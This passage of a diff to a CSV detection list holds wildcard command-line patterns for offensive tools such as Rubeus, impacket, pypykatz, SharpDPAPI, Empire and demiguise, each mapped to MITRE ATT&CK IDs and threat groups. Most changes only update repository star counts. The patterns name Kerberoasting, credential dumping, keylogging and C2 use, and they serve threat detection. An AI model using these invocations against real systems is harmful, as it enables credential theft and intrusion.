environmental keying) to avoid it being sandboxed.","T1564 - T1071.001 - T1071.004 - T1059 - T1070","TA0002 - TA0011 - TA0008","N/A","N/A","Defense Evasion","https://github.com/nccgroup/demiguise","1","0","N/A","9","10","1321","262","2022-11-09T08:12:25Z","2017-07-26T08:56:15Z" -"* -k * -c *cmd.exe /c * -o *.hta -p ShellBrowserWindow*","offensive_tool_keyword","demiguise","The aim of this project is to generate .html files that contain an encrypted HTA file. The idea is that when your target visits the page. the key is fetched and the HTA is decrypted dynamically within the browser and pushed directly to the user. This is an evasion technique to get round content / file-type inspection implemented by some security-appliances. This tool is not designed to create awesome HTA content. There are many other tools/techniques that can help you with that. What it might help you with is getting your HTA into an environment in the first place. and (if you use environmental keying) to avoid it being sandboxed.","T1564 - T1071.001 - T1071.004 - T1059 - T1070","TA0002 - TA0011 - TA0008","N/A","N/A","Defense Evasion","https://github.com/nccgroup/demiguise","1","0","N/A","9","10","1321","262","2022-11-09T08:12:25Z","2017-07-26T08:56:15Z" +"* -k * -c *.exe* -p Outlook.Application -o *.hta*","offensive_tool_keyword","demiguise","The aim of this project is to generate .html files that contain an encrypted HTA file. The idea is that when your target visits the page. the key is fetched and the HTA is decrypted dynamically within the browser and pushed directly to the user. This is an evasion technique to get round content / file-type inspection implemented by some security-appliances. This tool is not designed to create awesome HTA content. There are many other tools/techniques that can help you with that. What it might help you with is getting your HTA into an environment in the first place. and (if you use environmental keying) to avoid it being sandboxed.","T1564 - T1071.001 - T1071.004 - T1059 - T1070","TA0002 - TA0011 - TA0008","N/A","N/A","Defense Evasion","https://github.com/nccgroup/demiguise","1","0","N/A","9","10","1322","262","2022-11-09T08:12:25Z","2017-07-26T08:56:15Z" +"* -k * -c *cmd.exe /c * -o *.hta -p ShellBrowserWindow*","offensive_tool_keyword","demiguise","The aim of this project is to generate .html files that contain an encrypted HTA file. The idea is that when your target visits the page. the key is fetched and the HTA is decrypted dynamically within the browser and pushed directly to the user. This is an evasion technique to get round content / file-type inspection implemented by some security-appliances. This tool is not designed to create awesome HTA content. There are many other tools/techniques that can help you with that. What it might help you with is getting your HTA into an environment in the first place. and (if you use environmental keying) to avoid it being sandboxed.","T1564 - T1071.001 - T1071.004 - T1059 - T1070","TA0002 - TA0011 - TA0008","N/A","N/A","Defense Evasion","https://github.com/nccgroup/demiguise","1","0","N/A","9","10","1322","262","2022-11-09T08:12:25Z","2017-07-26T08:56:15Z" "* -k --kerberoast*","offensive_tool_keyword","SilentHound","Quietly enumerate an Active Directory Domain via LDAP parsing users + admins + groups...","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","N/A","AD Enumeration","https://github.com/layer8secure/SilentHound","1","0","N/A","N/A","5","430","44","2023-01-23T20:41:55Z","2022-07-01T13:49:24Z" -"* -k -request-user * -dc-ip*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/SecureAuthCorp/impacket","1","0","N/A","10","10","11786","3291","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"* -k -request-user * -dc-ip*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/SecureAuthCorp/impacket","1","0","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" "* k8gege520 *","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/k8gege/Ladon","1","0","N/A","10","10","4238","827","2023-09-11T14:47:26Z","2019-11-02T06:22:41Z" "* kalilinux/kali-rolling*","offensive_tool_keyword","Pezor","Open-Source Shellcode & PE Packer","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","Exploitation tools","https://github.com/phra/PEzor","1","0","N/A","10","10","1581","306","2023-09-26T14:00:33Z","2020-07-22T09:45:52Z" "* kdbof.cpp*","offensive_tool_keyword","cobaltstrike","Beacon Object File implementation of pwn1sher's KillDefender","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Octoberfest7/KillDefender_BOF","1","0","N/A","10","10","50","16","2022-06-28T15:54:15Z","2022-02-11T07:03:59Z" -"* keepass /unprotect*","offensive_tool_keyword","SharpDPAPI","SharpDPAPI is a C# port of some Mimikatz DPAPI functionality.","T1552.002 - T1059.001 - T1112","TA0006 - TA0002","N/A","N/A","Credential Access","https://github.com/GhostPack/SharpDPAPI","1","0","N/A","10","10","959","187","2023-08-28T19:03:12Z","2018-08-22T17:39:31Z" +"* keepass /unprotect*","offensive_tool_keyword","SharpDPAPI","SharpDPAPI is a C# port of some Mimikatz DPAPI functionality.","T1552.002 - T1059.001 - T1112","TA0006 - TA0002","N/A","N/A","Credential Access","https://github.com/GhostPack/SharpDPAPI","1","0","N/A","10","10","961","187","2023-08-28T19:03:12Z","2018-08-22T17:39:31Z" "* KeeTheft.exe*","offensive_tool_keyword","KeeThiefSyscalls","Patch GhostPack/KeeThief for it to use DInvoke and syscalls","T1003.001 - T1558.002","TA0006 - TA0005","N/A","N/A","Credential Access","https://github.com/Metro-Holografix/KeeThiefSyscalls","1","0","private github repo","10","1","N/A","N/A","N/A","N/A" -"* kerberoast *","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","N/A","10","3453","709","2023-09-25T09:48:31Z","2018-09-23T23:59:03Z" -"* kerberoast *","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","N/A","10","3453","709","2023-09-25T09:48:31Z","2018-09-23T23:59:03Z" +"* kerberoast *","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","N/A","10","3454","711","2023-09-25T09:48:31Z","2018-09-23T23:59:03Z" +"* kerberoast *","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","N/A","10","3454","711","2023-09-25T09:48:31Z","2018-09-23T23:59:03Z" "* kerberoast /spn:*","offensive_tool_keyword","nanorobeus","COFF file (BOF) for managing Kerberos tickets.","T1558.003 - T1208","TA0006 - TA0007","N/A","N/A","C2","https://github.com/wavvs/nanorobeus","1","0","N/A","10","10","234","28","2023-07-02T12:56:27Z","2022-07-04T00:33:30Z" "* Kerberoastables.txt*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" -"* --kerberoasting *","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","525","54","2023-10-03T21:19:24Z","2023-09-08T15:36:00Z" +"* --kerberoasting *","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" "* kerberos asreproast *","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/skelsec/pypykatz","1","0","N/A","N/A","10","2471","369","2023-05-30T16:14:22Z","2018-05-25T22:21:20Z" "* kerberos brute * -d *","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/skelsec/pypykatz","1","0","N/A","N/A","10","2471","369","2023-05-30T16:14:22Z","2018-05-25T22:21:20Z" "* kerberos brute *.txt*","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/skelsec/pypykatz","1","0","N/A","N/A","10","2471","369","2023-05-30T16:14:22Z","2018-05-25T22:21:20Z" @@ -1095,47 +1095,47 @@ "* kerberos kirbi parse *","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/skelsec/pypykatz","1","0","N/A","N/A","10","2471","369","2023-05-30T16:14:22Z","2018-05-25T22:21:20Z" "* kerberos spnroast *","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/skelsec/pypykatz","1","0","N/A","N/A","10","2471","369","2023-05-30T16:14:22Z","2018-05-25T22:21:20Z" "* kerberos tgt *kerberos+rc4://*:*@*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" -"* kerberos.py*","offensive_tool_keyword","crackmapexec","protocol scripts from crackmapexec. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","7678","1595","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" +"* kerberos.py*","offensive_tool_keyword","crackmapexec","protocol scripts from crackmapexec. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","7683","1597","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" "* --key examples/conspicuous.priv --isconspicuous*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" "* --key PPLBlade*","offensive_tool_keyword","PPLBlade","Protected Process Dumper Tool that support obfuscating memory dump and transferring it on remote workstations without dropping it onto the disk.","T1003.001 - T1027.004 - T1560.001 - T1039 - T1570","TA0006 - TA0005 - TA0010 - TA0003","N/A","N/A","Credential Access - Data Exfiltration","https://github.com/tastypepperoni/PPLBlade","1","0","N/A","10","4","324","36","2023-08-30T07:59:51Z","2023-08-29T19:36:04Z" -"* keylogger *","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","0","N/A","10","10","7841","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" +"* keylogger *","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","0","N/A","10","10","7843","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" "* --keyword * --check --ocr * --alexa*","offensive_tool_keyword","domainhunter","Checks expired domains for categorization/reputation and Archive.org history to determine good candidates for phishing and C2 domain names ","T1583.002 - T1568.002","TA0011 - TA0009","N/A","N/A","Phishing","https://github.com/threatexpress/domainhunter","1","0","N/A","N/A","10","1380","291","2022-10-26T03:15:13Z","2017-03-01T11:16:26Z" -"* -KillDate *","offensive_tool_keyword","empire","empire agent.ps1 arguments.Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1063","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" -"* -KillDays *","offensive_tool_keyword","empire","empire agent.ps1 arguments.Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1064","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"* -KillDate *","offensive_tool_keyword","empire","empire agent.ps1 arguments.Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1063","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"* -KillDays *","offensive_tool_keyword","empire","empire agent.ps1 arguments.Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1064","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "* kimi.py *","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/r00t-3xp10it/venom","1","0","N/A","N/A","10","1617","584","2023-10-03T22:06:35Z","2016-11-16T10:40:04Z" -"* KittyStager*","offensive_tool_keyword","KittyStager","KittyStager is a simple stage 0 C2. It is made of a web server to host the shellcode and an implant called kitten. The purpose of this project is to be able to have a web server and some kitten and be able to use the with any shellcode.","T1021.002 - T1055.012 - T1105","TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/Enelg52/KittyStager","1","0","N/A","10","10","175","34","2023-06-06T11:38:39Z","2022-10-10T11:31:23Z" -"* klist * /service:*","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","N/A","10","3453","709","2023-09-25T09:48:31Z","2018-09-23T23:59:03Z" +"* KittyStager*","offensive_tool_keyword","KittyStager","KittyStager is a simple stage 0 C2. It is made of a web server to host the shellcode and an implant called kitten. The purpose of this project is to be able to have a web server and some kitten and be able to use the with any shellcode.","T1021.002 - T1055.012 - T1105","TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/Enelg52/KittyStager","1","0","N/A","10","10","176","35","2023-06-06T11:38:39Z","2022-10-10T11:31:23Z" +"* klist * /service:*","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","N/A","10","3454","711","2023-09-25T09:48:31Z","2018-09-23T23:59:03Z" "* knx-gateway-discover.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* knx-gateway-info.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* KRB hijacking module *","offensive_tool_keyword","krbjack","A Kerberos AP-REQ hijacking tool with DNS unsecure updates abuse.","T1558.002 - T1552.004 - T1048.005","TA0006 - TA0007 ","N/A","N/A","Sniffing & Spoofing","https://github.com/almandin/krbjack","1","0","N/A","10","1","73","13","2023-05-21T15:00:07Z","2023-04-16T10:44:55Z" "* krb5-enum-users.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - 